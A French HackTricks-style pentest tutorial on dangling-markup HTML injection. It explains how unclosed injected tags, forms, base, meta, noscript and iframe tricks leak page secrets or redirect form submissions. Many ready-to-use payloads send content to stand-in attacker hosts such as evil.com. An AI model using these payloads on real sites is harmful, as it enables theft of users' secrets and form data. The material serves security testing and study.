.. | ||
README.md | ||
ss-leaks.md |
Dangling Markup - Injection HTML sans script
Apprenez le piratage AWS de zéro à héros avec htARTE (Expert en équipe rouge AWS de HackTricks)!
Autres façons de soutenir HackTricks :
- Si vous souhaitez voir votre entreprise annoncée dans HackTricks ou télécharger HackTricks en PDF, consultez les PLANS D'ABONNEMENT!
- Obtenez le swag officiel PEASS & HackTricks
- Découvrez La famille PEASS, notre collection exclusive de NFTs
- Rejoignez le 💬 groupe Discord ou le groupe Telegram ou suivez-nous sur Twitter 🐦 @carlospolopm.
- Partagez vos astuces de piratage en soumettant des PR aux HackTricks et HackTricks Cloud dépôts GitHub.
Résumé
Cette technique peut être utilisée pour extraire des informations d'un utilisateur lorsqu'une injection HTML est trouvée. Cela est très utile si vous ne trouvez aucun moyen d'exploiter un XSS mais que vous pouvez injecter des balises HTML.
C'est également utile si un secret est enregistré en clair dans le HTML et que vous souhaitez l'exfiltrer du client, ou si vous souhaitez induire en erreur l'exécution d'un script.
Plusieurs techniques commentées ici peuvent être utilisées pour contourner certaines Politiques de sécurité du contenu en exfiltrant des informations de manière inattendue (balises html, CSS, balises http-meta, formulaires, base...).
Principales Applications
Vol de secrets en texte clair
Si vous injectez <img src='http://evil.com/log.cgi?
lorsque la page est chargée, la victime vous enverra tout le code entre la balise img
injectée et la prochaine guillemet à l'intérieur du code. Si un secret est situé de quelque manière que ce soit dans ce fragment, vous le volerez (vous pouvez faire la même chose en utilisant des guillemets doubles, regardez ce qui pourrait être plus intéressant à utiliser).
Si la balise img
est interdite (en raison de la CSP par exemple), vous pouvez également utiliser <meta http-equiv="refresh" content="4; URL='http://evil.com/log.cgi?
<img src='http://attacker.com/log.php?HTML=
<meta http-equiv="refresh" content='0; url=http://evil.com/log.php?text=
<meta http-equiv="refresh" content='0;URL=ftp://evil.com?a=
Notez que Chrome bloque les URL HTTP contenant "<" ou "\n", vous pouvez donc essayer d'autres schémas de protocole comme "ftp".
Vous pouvez également abuser du CSS @import
(il enverra tout le code jusqu'à ce qu'il trouve un ";")
<style>@import//hackvertor.co.uk? <--- Injected
<b>steal me!</b>;
Vous pourriez également utiliser <table
:
<table background='//your-collaborator-id.burpcollaborator.net?'
Vous pourriez également insérer une balise <base
. Toutes les informations seront envoyées jusqu'à ce que la citation soit fermée, mais cela nécessite une certaine interaction de l'utilisateur (l'utilisateur doit cliquer sur un lien, car la balise base aura modifié le domaine pointé par le lien) :
<base target=' <--- Injected
steal me'<b>test</b>
Vol de formulaires
<base href='http://evil.com/'>
Ensuite, les formulaires qui envoient des données vers un chemin (comme <form action='update_profile.php'>
) enverront les données vers le domaine malveillant.
Vol de formulaires 2
Définissez un en-tête de formulaire : <form action='http://evil.com/log_steal'>
cela écrasera l'en-tête du formulaire suivant et toutes les données du formulaire seront envoyées à l'attaquant.
Vol de formulaires 3
Le bouton peut modifier l'URL vers laquelle les informations du formulaire vont être envoyées avec l'attribut "formaction" :
<button name=xss type=submit formaction='https://google.com'>I get consumed!
Un attaquant peut utiliser cela pour voler les informations.
Trouvez un exemple de cette attaque dans ce document.
Vol de secrets en texte clair 2
En utilisant la technique mentionnée précédemment pour voler des formulaires (en injectant un nouvel en-tête de formulaire), vous pouvez ensuite injecter un nouveau champ d'entrée :
<input type='hidden' name='review_body' value="
et ce champ de saisie contiendra tout le contenu entre ses guillemets doubles et les guillemets doubles suivants dans le HTML. Cette attaque mélange le "Vol de secrets en texte clair" avec "Vol de formulaires2".
Vous pouvez faire la même chose en injectant un formulaire et une balise <option>
. Toutes les données jusqu'à ce qu'un </option>
fermé soit trouvé seront envoyées:
<form action=http://google.com><input type="submit">Click Me</input><select name=xss><option
Injection de paramètre de formulaire
Vous pouvez modifier le chemin d'un formulaire et insérer de nouvelles valeurs pour qu'une action inattendue soit effectuée :
<form action='/change_settings.php'>
<input type='hidden' name='invite_user'
value='fredmbogo'> ← Injected lines
<form action="/change_settings.php"> ← Existing form (ignored by the parser)
...
<input type="text" name="invite_user" value=""> ← Subverted field
...
<input type="hidden" name="xsrf_token" value="12345">
...
</form>
Vol de secrets en texte clair via noscript
<noscript></noscript>
est une balise dont le contenu sera interprété si le navigateur ne prend pas en charge JavaScript (vous pouvez activer/désactiver JavaScript dans Chrome à chrome://settings/content/javascript).
Une façon d'exfiltrer le contenu de la page web du point d'injection jusqu'en bas vers un site contrôlé par un attaquant sera d'injecter ceci :
<noscript><form action=http://evil.com><input type=submit style="position:absolute;left:0;top:0;width:100%;height:100%;" type=submit value=""><textarea name=contents></noscript>
Contournement de CSP avec interaction utilisateur
À partir de cette recherche de portswiggers, vous pouvez apprendre que même dans les environnements les plus restreints par CSP, vous pouvez toujours exfiltrer des données avec une certaine interaction utilisateur. Cette fois, nous allons utiliser la charge utile :
<a href=http://attacker.net/payload.html><font size=100 color=red>You must click me</font></a>
<base target='
Notez que vous demanderez à la victime de cliquer sur un lien qui la redirigera vers un payload contrôlé par vous. Notez également que l'attribut target
à l'intérieur de la balise base
contiendra du contenu HTML jusqu'à l'apostrophe suivante.
Cela fera en sorte que la valeur de window.name
si le lien est cliqué sera tout ce contenu HTML. Par conséquent, comme vous contrôlez la page à laquelle la victime accède en cliquant sur le lien, vous pouvez accéder à ce window.name
et exfiltrer ces données:
<script>
if(window.name) {
new Image().src='//your-collaborator-id.burpcollaborator.net?'+encodeURIComponent(window.name);
</script>
Attaque de l'espace de noms HTML
Insérez une nouvelle balise avec un identifiant à l'intérieur du HTML qui écrasera la suivante et avec une valeur qui affectera le flux d'un script. Dans cet exemple, vous sélectionnez avec qui une information va être partagée:
<input type='hidden' id='share_with' value='fredmbogo'> ← Injected markup
...
Share this status update with: ← Legitimate optional element of a dialog
<input id='share_with' value=''>
...
function submit_status_update() {
...
request.share_with = document.getElementById('share_with').value;
...
}
Flux de travail de script trompeur 2 - Attaque de l'espace de noms du script
Créez des variables à l'intérieur de l'espace de noms javascript en insérant des balises HTML. Ensuite, cette variable affectera le flux de l'application:
<img id='is_public'> ← Injected markup
...
// Legitimate application code follows
function retrieve_acls() {
...
if (response.access_mode == AM_PUBLIC) ← The subsequent assignment fails in IE
is_public = true;
else
is_public = false;
}
function submit_new_acls() {
...
if (is_public) request.access_mode = AM_PUBLIC; ← Condition always evaluates to true
...
}
Abus de JSONP
Si vous trouvez une interface JSONP, vous pourriez être en mesure d'appeler une fonction arbitraire avec des données arbitraires :
<script src='/editor/sharing.js'>: ← Legitimate script
function set_sharing(public) {
if (public) request.access_mode = AM_PUBLIC;
else request.access_mode = AM_PRIVATE;
...
}
<script src='/search?q=a&call=set_sharing'>: ← Injected JSONP call
set_sharing({ ... })
Ou vous pouvez même essayer d'exécuter du javascript :
<script src='/search?q=a&call=alert(1)'></script>
Mauvais usage des iframes
Un document enfant possède la capacité de visualiser et de modifier la propriété location
de son parent, même dans des situations de cross-origin. Cela permet d'intégrer un script dans un iframe qui peut rediriger le client vers une page arbitraire :
<html><head></head><body><script>top.window.location = "https://attacker.com/hacked.html"</script></body></html>
Cela peut être atténué avec quelque chose comme : sandbox=' allow-scripts allow-top-navigation'
Un iframe peut également être utilisé pour divulguer des informations sensibles à partir d'une page différente en utilisant l'attribut de nom de l'iframe. Cela est dû au fait que vous pouvez créer un iframe qui s'iframe lui-même en abusant de l'injection HTML qui fait apparaître les informations sensibles à l'intérieur de l'attribut de nom de l'iframe, puis accéder à ce nom depuis l'iframe initial et le divulguer.
<script>
function cspBypass(win) {
win[0].location = 'about:blank';
setTimeout(()=>alert(win[0].name), 500);
}
</script>
<iframe src="//subdomain1.portswigger-labs.net/bypassing-csp-with-dangling-iframes/target.php?email=%22><iframe name=%27" onload="cspBypass(this.contentWindow)"></iframe>
Pour plus d'informations, consultez https://portswigger.net/research/bypassing-csp-with-dangling-iframes
Abus de <meta
Vous pouvez utiliser meta http-equiv
pour effectuer plusieurs actions comme définir un Cookie : <meta http-equiv="Set-Cookie" Content="SESSID=1">
ou effectuer une redirection (dans 5s dans ce cas) : <meta name="language" content="5;http://attacker.svg" HTTP-EQUIV="refresh" />
Cela peut être évité avec un CSP concernant http-equiv (Content-Security-Policy: default-src 'self';
, ou Content-Security-Policy: http-equiv 'self';
)
Nouvelle balise HTML <portal
Vous pouvez trouver une recherche très intéressante sur les vulnérabilités exploitables de la balise <portal ici.
Au moment de la rédaction de cet article, vous devez activer la balise portal sur Chrome dans chrome://flags/#enable-portals
sinon cela ne fonctionnera pas.
<portal src='https://attacker-server?
Fuites HTML
Toutes les façons de divulguer la connectivité en HTML ne seront pas utiles pour le Dangling Markup, mais parfois cela pourrait aider. Consultez-les ici: https://github.com/cure53/HTTPLeaks/blob/master/leak.html
Fuites SS
Il s'agit d'un mélange entre le dangling markup et les XS-Leaks. D'un côté, la vulnérabilité permet d'injecter du HTML (mais pas de JS) dans une page de la même origine que celle que nous attaquerons. D'un autre côté, nous n'attaquerons pas directement la page où nous pouvons injecter du HTML, mais une autre page.
{% content-ref url="ss-leaks.md" %} ss-leaks.md {% endcontent-ref %}
XS-Search/XS-Leaks
Les XS-Search sont orientés pour exfiltrer des informations entre origines en abusant des attaques de canal secondaire. Par conséquent, c'est une technique différente du Dangling Markup, cependant, certaines des techniques abusent de l'inclusion de balises HTML (avec et sans exécution de JS), comme l'injection de CSS ou le chargement paresseux des images.
{% content-ref url="../xs-search/" %} xs-search {% endcontent-ref %}
Liste de détection de force brute
{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/dangling_markup.txt" %}
Références
- https://aswingovind.medium.com/content-spoofing-yes-html-injection-39611d9a4057
- http://lcamtuf.coredump.cx/postxss/
- http://www.thespanner.co.uk/2011/12/21/html-scriptless-attacks/
- https://portswigger.net/research/evading-csp-with-dom-based-dangling-markup
Apprenez le piratage AWS de zéro à héros avec htARTE (HackTricks AWS Red Team Expert)!
Autres façons de soutenir HackTricks:
- Si vous souhaitez voir votre entreprise annoncée dans HackTricks ou télécharger HackTricks en PDF, consultez les PLANS D'ABONNEMENT!
- Obtenez le swag officiel PEASS & HackTricks
- Découvrez The PEASS Family, notre collection exclusive de NFTs
- Rejoignez le 💬 groupe Discord ou le groupe Telegram ou suivez-nous sur Twitter 🐦 @carlospolopm.
- Partagez vos astuces de piratage en soumettant des PR aux HackTricks et HackTricks Cloud github repos.